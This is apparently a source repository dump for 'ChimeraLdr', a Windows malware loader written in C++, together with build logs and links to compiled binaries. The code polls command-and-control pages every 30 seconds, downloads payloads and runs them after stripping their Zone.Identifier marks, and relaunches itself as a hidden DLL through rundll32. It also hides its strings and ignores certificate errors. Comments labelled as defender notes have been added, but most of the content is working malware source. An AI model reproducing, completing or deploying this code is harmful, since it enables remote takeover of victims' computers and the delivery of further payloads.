HINTERNET hRequest = HttpOpenRequestW(hConnect, GetSz, pUserId, HttpVersz, 0, 0, 221 | INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | 222 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | 223 | INTERNET_FLAG_NO_AUTH | 224 | INTERNET_FLAG_NO_CACHE_WRITE | 225 | INTERNET_FLAG_NO_UI | 226 | INTERNET_FLAG_SECURE | 227 | INTERNET_FLAG_PRAGMA_NOCACHE | 228 | INTERNET_FLAG_RELOAD, NULL); 229 | 230 | if (hRequest) 231 | { 232 | dbg(L"Request opened"); 233 | if (HttpSendRequestW(hRequest, 0, 0, 0, 0)) 234 | { 235 | dbg("Request sent"); 236 | PCHAR pResponse = (PCHAR)VirtualAlloc(0, 10240, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 237 | 238 | if (pResponse) 239 | { 240 | DWORD dwRead; 241 | dbg("Reading html: "); 242 | while (InternetReadFile(hRequest, pResponse, 10240 - 1, &dwRead) && dwRead) 243 | { 244 | pResponse[dwRead] = 0; 245 | PCHAR pFoundCommand; 246 | if (ParseHtml(pResponse, dwRead, &pFoundCommand)) 247 | { 248 | dbg("Found watermark"); 249 | PCHAR pFoundCommandEnd = mystrstr(pFoundCommand, ENDWATERMARK); 250 | if (!pFoundCommandEnd) 251 | break; 252 | pFoundCommandEnd[0] = '\0'; 253 | 254 | lstrcpyA(pCommandOutput, pFoundCommand); 255 | 256 | bRet = TRUE; 257 | } 258 | else 259 | { 260 | dbg("Watermark not found in this block"); 261 | } 262 | if (bRet) 263 | { 264 | break; 265 | } 266 | dwRead = 0; 267 | } 268 | VirtualFree(pResponse, 0, MEM_RELEASE); 269 | } 270 | } 271 | InternetCloseHandle(hRequest); 272 | } 273 | 274 | InternetCloseHandle(hInternet); 275 | return bRet; 276 | } 277 | 278 | 279 | 280 | BOOL IsCorrect(PWCHAR RequestUrl) 281 | { 282 | BOOL bDot = FALSE; 283 | BOOL bSlash = FALSE; 284 | 285 | WCHAR HttpSz[] = 286 | { 287 | L'h', L't', L't', L'p', L':', L'/', L'/', '\0' 288 | }; 289 | PWCHAR lpHttpStart = mystrstr(RequestUrl, L"http://"); 290 | 291 | if (!lpHttpStart) 292 | return FALSE; 293 | 294 | 295 | if (RequestUrl != lpHttpStart) 296 | return FALSE; 297 | 298 | RequestUrl += 7; 299 | 300 | for (INT i = 0; i < 
lstrlenW(RequestUrl); i++) 301 | { 302 | if (RequestUrl[i] == L'.') 303 | bDot = TRUE; 304 | else if (RequestUrl[i] == L'/') 305 | bSlash = TRUE; 306 | } 307 | return ((bDot) && (bSlash)); 308 | } 309 | 310 | class RAII_VirtualAlloc 311 | { 312 | public: 313 | RAII_VirtualAlloc(DWORD dwSize) 314 | { 315 | pAddr = VirtualAlloc(0, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 316 | } 317 | ~RAII_VirtualAlloc() 318 | { 319 | VirtualFree(pAddr, 0, MEM_RELEASE); 320 | } 321 | LPVOID GetAddr() 322 | { 323 | return pAddr; 324 | } 325 | private: 326 | LPVOID pAddr; 327 | }; 328 | 329 | BOOL GetDomainPart(PWCHAR pOut, PWCHAR RequestUrl, DWORD dwLen) 330 | { 331 | RequestUrl += 7; // îáðåçàåì http:// 332 | lstrcpyW(pOut, RequestUrl); 333 | 334 | for (INT i = 0; i < lstrlenW(RequestUrl); i++) 335 | { 336 | if (pOut[i] == L'/') 337 | { 338 | pOut[i] = '\0'; 339 | break; 340 | } 341 | } 342 | 343 | return TRUE; 344 | } 345 | 346 | BOOL GetScriptPart(PWCHAR pOut, PWCHAR RequestUrl, DWORD dwLen) 347 | { 348 | RequestUrl += 7; 349 | 350 | for (INT i = 0; i < lstrlenW(RequestUrl); i++) 351 | { 352 | if (RequestUrl[i] == L'/') 353 | { 354 | RequestUrl += i; 355 | lstrcpyW(pOut, RequestUrl); 356 | break; 357 | } 358 | } 359 | 360 | return TRUE; 361 | } 362 | 363 | BOOL MakeRequest(PCHAR RequestUrl, PWCHAR SensitiveInformation) 364 | { 365 | RAII_VirtualAlloc UnicodeUrl(512); 366 | PWCHAR pUnicodeUrl = (PWCHAR)UnicodeUrl.GetAddr(); 367 | 368 | if (!pUnicodeUrl) 369 | return FALSE; 370 | 371 | wsprintfW(pUnicodeUrl, L"%S", RequestUrl); 372 | 373 | if (!IsCorrect(pUnicodeUrl)) 374 | return FALSE; 375 | 376 | RAII_VirtualAlloc DomainPart(512); 377 | RAII_VirtualAlloc ScriptPart(512); 378 | 379 | PWCHAR pDomainPart = (PWCHAR)DomainPart.GetAddr(); 380 | PWCHAR pScriptPart = (PWCHAR)ScriptPart.GetAddr(); 381 | 382 | if (!GetDomainPart(pDomainPart, pUnicodeUrl, 512)) 383 | return FALSE; 384 | if (!GetScriptPart(pScriptPart, pUnicodeUrl, 512)) 385 | return FALSE; 386 | 387 | HINTERNET 
hInternet; 388 | do 389 | { 390 | hInternet = OpenInternet(SensitiveInformation); 391 | } while (!hInternet); 392 | 393 | BOOL bRet = FALSE; 394 | 395 | DWORD dwTries = 0; 396 | 397 | HINTERNET hConnect; 398 | do 399 | { 400 | hConnect = InternetConnectW(hInternet, pDomainPart, INTERNET_DEFAULT_HTTPS_PORT, L"", L"", INTERNET_SERVICE_HTTP, 0, 0); 401 | dwTries++; 402 | if ((dwTries == 5) && (!hConnect)) 403 | { 404 | InternetCloseHandle(hInternet); 405 | return FALSE; 406 | } 407 | } while ((!hConnect) || (Sleep(10000), FALSE)); 408 | 409 | 410 | WCHAR GetSz[] = 411 | { 412 | L'G', L'E', L'T', L'\0' 413 | }; 414 | 415 | WCHAR HttpVersz[] = 416 | { 417 | L'H', L'T', L'T', L'P', L'/', L'1', L'.', L'1', '\0' 418 | }; 419 | 420 | HINTERNET hRequest = HttpOpenRequestW(hConnect, GetSz, pScriptPart, HttpVersz, 0, 0, 421 | INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | 422 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | 423 | INTERNET_FLAG_NO_AUTH | 424 | INTERNET_FLAG_NO_CACHE_WRITE | 425 | INTERNET_FLAG_NO_UI | 426 | INTERNET_FLAG_SECURE | 427 | INTERNET_FLAG_PRAGMA_NOCACHE | 428 | INTERNET_FLAG_RELOAD, NULL); 429 | 430 | if (hRequest) 431 | { 432 | 433 | if (HttpSendRequestW(hRequest, 0, 0, 0, 0)) 434 | bRet = TRUE; 435 | 436 | InternetCloseHandle(hRequest); 437 | } 438 | 439 | InternetCloseHandle(hInternet); 440 | return bRet; 441 | } 442 | 443 | BOOL DownloadNexecute(PCHAR pUrl) 444 | { 445 | GlobalMemory MyMem(1024 + 2 + 512 + 100); 446 | PWCHAR pUnicodeUrl = (PWCHAR)MyMem.localloc(512); 447 | wsprintfW(pUnicodeUrl, L"%S", pUrl); 448 | PWCHAR pTarget = (PWCHAR)MyMem.localloc(512); 449 | 450 | WCHAR szRandomString[RandomDirectoryLen + 4 + 1] = 451 | { 452 | L'P', L'a', L'i', L'm', L'o', L'n', L'\0' 453 | }; 454 | 455 | if (!GenerateRandomString(szRandomString, RandomDirectoryLen)) 456 | dbg("Can not gen random string, using default"); 457 | 458 | Downloader Dwnld; 459 | 460 | HRESULT hRes = SHGetFolderPathW(0, CSIDL_APPDATA | CSIDL_FLAG_CREATE, NULL, 
// NOTE(review): tail of DownloadNexecute() — the function starts before this chunk; left as found.
SHGFP_TYPE_CURRENT, pTarget);
    if (hRes != S_OK)
        GetTempPathW(256, pTarget);

    lstrcatW(pTarget, L"\\");

    lstrcatW(pTarget, szRandomString);
    HINSTANCE hInst = (HINSTANCE)0;
    if (Dwnld.save(pUnicodeUrl, pTarget))
    {
        PWCHAR pZoneIdentifier = (PWCHAR)MyMem.localloc(512 + 100);
        WCHAR ZoneIdent[] =
        {
            L'%', L's', L':', L'Z', L'o', L'n', L'e', L'.',
            L'I', L'd', L'e', L'n', L't',
            L'i', L'f', L'i', L'e', L'r', L'\0'
        };
        wsprintfW(pZoneIdentifier, ZoneIdent, pTarget);

        if (DeleteFileW(pZoneIdentifier))
            dbg("Zone identifier found and removed");

        WCHAR szOpen[] =
        {
            L'o', L'p', L'e', L'n', L'\0'
        };
        hInst = ShellExecuteW(0, szOpen, pTarget, 0, 0, SW_SHOW);
    }
    return ((INT)hInst > 32);
}

/*
 * ControlMain — the loader's command-and-control loop.  Never returns: it
 * polls three hard-coded paths ("/id1", "/id2", "/id3") through GetCommand()
 * every 30 seconds, acts on the first page that answers, and only leaves the
 * loop via ExitProcess() (the cleanup after the loop is unreachable).
 *
 * Command grammar as implemented below (substring match through mystrstr, so
 * the token may appear anywhere in the fetched body):
 *   msgc<text>         -> MessageBoxA(text)
 *   statc<base64 url>  -> MakeRequest(decoded url, "Bearldr")
 *   nopc               -> no operation
 *   dwnld<base64 url>  -> DownloadNexecute(decoded url): file saved, its
 *                         Zone.Identifier stream deleted, ShellExecuteW "open"
 * The tokens are assembled character-by-character on the stack so the plain
 * strings do not appear in the binary's string table; they are fully visible
 * in process memory at runtime.
 *
 * Defender notes: fixed 30 s beacon with no jitter, fixed URI paths, and
 * MessageBoxA / ShellExecuteW reachable from a rundll32-hosted DLL
 * (see CreateDllProcess in Install.cpp).
 *
 * Returns: never (declared DWORD so it can serve as a thread start routine).
 */
DWORD WINAPI ControlMain()
{

    // Two page-backed buffers: the command just fetched and the last one acted
    // upon.  VirtualAlloc rounds each to a full page and zero-fills it.
    PCHAR pCommand = (PCHAR)VirtualAlloc(0, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!pCommand)
        ExitProcess(0);
    PCHAR pCommandOld = (PCHAR)VirtualAlloc(0, 1025, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // BUG (observed, not changed in this pass): this re-tests pCommand, which is
    // already known non-NULL; pCommandOld is never checked, so a failed second
    // allocation dereferences NULL in the lstrcpyA below.
    if (!pCommand)
    {
        VirtualFree(pCommand, 0, MEM_RELEASE);
        ExitProcess(0);
    }

    // Sentinel "previous command" so the first real command is never treated
    // as a duplicate.
    lstrcpyA(pCommandOld, "AAAAAA");

    PCHAR pData;

    BOOL bFound = FALSE;
    while (TRUE)
    {

        // C2 paths tried in order on every iteration; the host part is
        // supplied by GetCommand(), which is outside this chunk.
        const INT PAGE_NUM = 3;
        PWCHAR szPages[PAGE_NUM] =
        {
            L"/id1",
            L"/id2",
            L"/id3"
        };

        for (INT i = 0; i < PAGE_NUM; i++)
        {
            // GetCommand() fills pCommand (1024 bytes); its bounds handling is
            // not visible here — TODO confirm it NUL-terminates within 1024
            // bytes, because lstrcpyA below copies until NUL.
            bFound = GetCommand(pCommand, szPages[i]);
            if (bFound)
            {
                dbg(L"Found C&C page:", szPages[i]);
                dbg("Read command: ", pCommand);

                // De-duplication: an unchanged page body is not re-executed.
                if (!lstrcmpA(pCommandOld, pCommand))
                {
                    dbg("Already executed");
                    break;
                }
                lstrcpyA(pCommandOld, pCommand);

                // Command tokens, built on the stack (string hiding).
                CHAR MsgCom[] =
                {
                    'm', 's', 'g', 'c', '\0'
                };

                CHAR StatCom[] =
                {
                    's', 't', 'a', 't',
                    'c', '\0'
                };

                CHAR NoOperation[] =
                {
                    'n', 'o', 'p', 'c', '\0'
                };

                CHAR CommDownload[] =
                {
                    'd', 'w', 'n', 'l', 'd', '\0'
                };

                // msgc: everything after the 4-byte token is shown in a message box.
                if (mystrstr(pCommand, MsgCom))
                {
                    dbg(L"Found command msgc");
                    pData = mystrstr(pCommand, MsgCom) + 4;
                    if (*pData != '\0')
                    {
                        MessageBoxA(0, pData, pData, MB_OK);
                    }
                }
                // statc: the payload after the 5-byte token is base64; it is
                // decoded and handed to MakeRequest() with the "Bearldr" tag.
                else if (mystrstr(pCommand, StatCom)) //format http://subdomain.server.com/script.php or http://server.com/script.php
                {
                    dbg(L"Found command stat");
                    pData = mystrstr(pCommand, StatCom) + 5;
                    if (*pData != '\0')
                    {

                        // +2 slack for a terminator; whether Base64decode()
                        // writes one is not visible here — TODO confirm.
                        PCHAR pUrl = (PCHAR)VirtualAlloc(0, Base64decode_len(pData) + 2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

                        if (pUrl)
                        {
                            Base64decode(pUrl, pData);

                            // Presumably an identifier sent along with the
                            // request; MakeRequest() is outside this chunk — verify.
                            WCHAR BearIdentificator[] =
                            {
                                L'B', L'e', L'a', L'r', L'l', L'd', L'r', L'\0'
                            };
                            MakeRequest(pUrl, BearIdentificator);

                            VirtualFree(pUrl, 0, MEM_RELEASE);
                        }

                    }
                }
                else if (mystrstr(pCommand, NoOperation))
                {
                    dbg(L"No operation");
                }
                // dwnld: base64 URL after the 5-byte token, fetched and run by
                // DownloadNexecute() above.
                else if (mystrstr(pCommand, CommDownload))
                {
                    dbg(L"Download and execute command found");
                    pData = mystrstr(pCommand, CommDownload) + 5;
                    if (*pData != '\0')
                    {
                        PCHAR pUrl = (PCHAR)VirtualAlloc(0, Base64decode_len(pData) + 2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

                        if (pUrl)
                        {
                            Base64decode(pUrl, pData);

                            if (DownloadNexecute(pUrl))
                            {
                                dbg("Downloaded and executed!");
                            }
                            else
                            {
                                dbg("Error downloading and executing file");
                            }

                            VirtualFree(pUrl, 0, MEM_RELEASE);
                        }
                    }
                }

                // Only the first responding page is consulted per iteration.
                break;
            }
            else
            {
                dbg(L"Is not C&C: ", szPages[i]);


            }
        }
        // Fixed beacon interval — no jitter.
        dbg(L"Sleeping 30 secs");
        Sleep(30 * 1000);
    }
    // Unreachable: the loop above has no exit path.
    VirtualFree(pCommand, 0, MEM_RELEASE);
    VirtualFree(pCommandOld, 0, MEM_RELEASE);
    ExitProcess(0);
}

--------------------------------------------------------------------------------
/ChimeraLdr/Control.h:
--------------------------------------------------------------------------------
#pragma once
#include "global.h"

// C2 polling loop; never returns (see Control.cpp).
DWORD WINAPI ControlMain();

--------------------------------------------------------------------------------
/ChimeraLdr/Debug/Chimera.Build.CppClean.log:
--------------------------------------------------------------------------------
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\vc142.pdb
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\vc142.idb
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\utils.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\urlsaver.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\memory.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\install.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\global.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\chimera.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\chimera.tlog\cl.command.1.tlog
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\chimera.tlog\cl.read.1.tlog
c:\users\malpwn\documents\github_stuff\chimeraldr\debug\chimera.tlog\cl.write.1.tlog
--------------------------------------------------------------------------------
/ChimeraLdr/Debug/Chimera.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.dll
--------------------------------------------------------------------------------
/ChimeraLdr/Debug/Chimera.dll.recipe:
--------------------------------------------------------------------------------





C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.dll 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.exp -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.ilk -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.lib -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.log: -------------------------------------------------------------------------------- 1 |  Chimera.cpp 2 | Control.cpp 3 | global.cpp 4 | Install.cpp 5 | memory.cpp 6 | urlsaver.cpp 7 | utils.cpp 8 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\utils.cpp(18,23): warning C4244: '=': conversion from 'DWORD' to 'WCHAR', possible loss of data 9 | Generating Code... 
10 | Creating library C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.lib and object C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.exp 11 | Chimera.vcxproj -> C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.dll 12 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.pdb -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/CL.write.1.tlog 
-------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/Chimera.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.28.29910:TargetPlatformVersion=10.0.19041.0:VcpkgTriplet=x86-windows: 2 | Debug|Win32|C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\| 3 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/Chimera.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/Chimera.write.1u.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/link.write.1.tlog -------------------------------------------------------------------------------- 
/ChimeraLdr/Debug/Chimera.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.dll 2 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Control.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Control.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Install.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Install.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/global.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/global.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/memory.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/memory.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/urlsaver.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/urlsaver.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/utils.obj: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/utils.obj
--------------------------------------------------------------------------------
/ChimeraLdr/Debug/vc142.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/vc142.idb
--------------------------------------------------------------------------------
/ChimeraLdr/Debug/vc142.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/vc142.pdb
--------------------------------------------------------------------------------
/ChimeraLdr/Debug/vcpkg.applocal.log:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/ChimeraLdr/Install.cpp:
--------------------------------------------------------------------------------
#include "global.h"

/*
 * ProcessData — scratch block carved out of a GlobalMemory page so that the
 * STARTUPINFO / PROCESS_INFORMATION pair and the command line do not live on
 * the stack.  The page comes from VirtualAlloc, so all fields start zeroed.
 */
struct ProcessData
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    WCHAR lpCommandLine[512];
};


/*
 * CreateDllProcess — launches the dropped copy through rundll32.exe as
 *     rundll32.exe "<pDllPath>",CHIMERA
 * i.e. the loader re-hosts itself inside a Microsoft-signed binary (LOLBin).
 * The program name and the export name are assembled on the stack (string
 * hiding); they are plainly visible on the child's command line.
 *
 * pDllPath: full path of the DLL-flagged copy written by BlockCopy().
 * Returns:  TRUE if CreateProcessW succeeded.  The child's handles are closed
 *           at once; it is not waited on.
 *
 * Defender notes: lpApplicationName is NULL, so "rundll32.exe" is resolved by
 * the CreateProcess search order rather than an absolute System32 path; a
 * rundll32.exe child whose argument is a ".jpg"-named DLL (see Install() in
 * Chimera.cpp) with export "CHIMERA" is a strong indicator.
 */
BOOL CreateDllProcess(LPWSTR pDllPath)
{
    GlobalMemory MyMem(sizeof(ProcessData)+1);

    ProcessData *lpProcInfo = (ProcessData*)MyMem.localloc(sizeof(ProcessData));
    if (!lpProcInfo)
    {
        dbg("No memory in CreateDllProcess");
        return FALSE;
    }

    BOOL bRet = FALSE;

    // Only cb is set; the rest of si is already zero (page-backed memory).
    lpProcInfo->si.cb = sizeof(STARTUPINFO);

    WCHAR lpApplicationName[] = { L'r', L'u', L'n', L'd', L'l', L'l', L'3', L'2', L'.', L'e', L'x', L'e', L'\0' };
    WCHAR lpEntryPointName[] = { L'C', L'H', L'I', L'M', L'E', L'R', L'A', L'\0' };

    // 512 WCHARs hold rundll32.exe + a MAX_PATH-sized quoted path + ",CHIMERA".
    wsprintfW(lpProcInfo->lpCommandLine, L"%s \"%s\",%s", lpApplicationName, pDllPath, lpEntryPointName);
    // si is the TCHAR alias STARTUPINFO; the cast selects the wide variant.
    // Harmless when UNICODE is defined (the A/W structs have identical layout
    // apart from string-pointer types).
    bRet = CreateProcessW(0, lpProcInfo->lpCommandLine, 0, 0, 0, 0, 0, 0, (LPSTARTUPINFOW)&lpProcInfo->si, &lpProcInfo->pi);

    // Debug builds log the full command line (wide dbg overload).
    dbg(lpApplicationName);
    dbg(lpProcInfo->lpCommandLine);

    if (bRet)
    {
        CloseHandle(lpProcInfo->pi.hProcess);
        CloseHandle(lpProcInfo->pi.hThread);
    }

    return bRet;
}

/*
 * OpenFile — thin CreateFileW wrapper with FILE_SHARE_READ hard-coded.
 * Overloads the legacy Win32 OpenFile() (which takes LPCSTR/LPOFSTRUCT/UINT);
 * C++ overload resolution picks this one for the LPWSTR callers in this file.
 */
HANDLE OpenFile(LPWSTR pFile, DWORD dwAccess, DWORD dwAttrib, DWORD dwCreateDisposition)
{
    return CreateFileW(pFile, dwAccess, FILE_SHARE_READ, 0, dwCreateDisposition, dwAttrib, 0);
}

/*
 * GetFileMapping — whole-file section object, copy-on-write: writes through a
 * view land in private pages and never reach the source file.
 */
HANDLE GetFileMapping(HANDLE hFile)
{
    return CreateFileMapping(hFile, 0, PAGE_WRITECOPY, 0, 0, 0);
}

// MapToMemory — maps the entire section copy-on-write (FILE_MAP_COPY).
LPVOID MapToMemory(HANDLE hMap)
{
    return MapViewOfFile(hMap, FILE_MAP_COPY, 0, 0, 0);
}

/*
 * BlockCopy — copies the image at pFrom to pTo, setting IMAGE_FILE_DLL in the
 * copy's COFF header on the way (SetDllFlag on the copy-on-write view), so the
 * written file can be loaded with rundll32 / LoadLibrary.  The target is
 * created with FILE_ATTRIBUTE_HIDDEN.
 *
 * pFrom: path of the source image (the running executable, in Install()).
 * pTo:   destination path; overwritten if it exists (CREATE_ALWAYS).
 * Returns TRUE only if the single WriteFile call succeeded.
 *
 * Observations (documentation pass only — nothing changed):
 *  - The `if (hFile)` after GetFileMapping() tests the wrong handle: hFile is
 *    already known valid, so a failed CreateFileMapping (NULL) still reaches
 *    MapViewOfFile(NULL) and then CloseHandle(NULL).
 *  - GetFileSize()'s high DWORD is ignored and dwWritten is not compared with
 *    dwFileSize; adequate for a small loader image, not a general file copy.
 *  - Nothing in the visible code recomputes the PE checksum after the header
 *    patch.
 */
BOOL BlockCopy(LPWSTR pFrom, LPWSTR pTo)
{
    HANDLE hFile = OpenFile(pFrom, GENERIC_READ, FILE_ATTRIBUTE_NORMAL, OPEN_EXISTING);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        dbg(L"Can not read: ", pFrom);
        return FALSE;
    }

    BOOL bRet = FALSE;

    HANDLE hMapping = GetFileMapping(hFile);
    if (hFile)   // should be hMapping — see header comment
    {
        LPVOID pMem = MapToMemory(hMapping);
        if (pMem)
        {
            // Patch happens in the private copy-on-write pages; the file on
            // disk at pFrom is untouched.
            PIMAGE_DOS_HEADER pDosHead = (PIMAGE_DOS_HEADER)pMem;
            if (SetDllFlag(pDosHead))
            {
                HANDLE hTargetFile = OpenFile(pTo, GENERIC_WRITE, FILE_ATTRIBUTE_HIDDEN, CREATE_ALWAYS);
                if (hTargetFile != INVALID_HANDLE_VALUE)
                {
                    DWORD dwWritten;
                    DWORD dwFileSize = GetFileSize(hFile, 0);
                    bRet = WriteFile(hTargetFile, pMem, dwFileSize, &dwWritten, 0);
                    CloseHandle(hTargetFile);
                }
                else
                {
                    dbg(L"Can not create target file: ", pTo);
                }
            }
            else
            {
                // Prints the first mapped bytes as an ANSI string (debug only).
                dbg("Can not set dll flag to file: ");
                dbg((PCHAR)pMem);
            }
            UnmapViewOfFile(pMem);
        }
        else
        {
            dbg("Can not map to memory");
        }

        CloseHandle(hMapping);
    }
    else
    {
        dbg("Can not create filemapping");
    }
    CloseHandle(hFile);
    return bRet;
}
--------------------------------------------------------------------------------
/ChimeraLdr/Install.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Install.h
--------------------------------------------------------------------------------
/ChimeraLdr/Release/Chimera.Build.CppClean.log:
--------------------------------------------------------------------------------
c:\users\malpwn\documents\github_stuff\chimeraldr\release\vc142.pdb
c:\users\malpwn\documents\github_stuff\chimeraldr\release\utils.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\release\urlsaver.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\release\memory.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\release\install.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\release\global.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\release\control.obj
c:\users\malpwn\documents\github_stuff\chimeraldr\release\chimera.tlog\cl.command.1.tlog
c:\users\malpwn\documents\github_stuff\chimeraldr\release\chimera.tlog\cl.read.1.tlog
c:\users\malpwn\documents\github_stuff\chimeraldr\release\chimera.tlog\cl.write.1.tlog
--------------------------------------------------------------------------------
/ChimeraLdr/Release/Chimera.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.exe
--------------------------------------------------------------------------------
/ChimeraLdr/Release/Chimera.exe.recipe:
--------------------------------------------------------------------------------




C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.exe





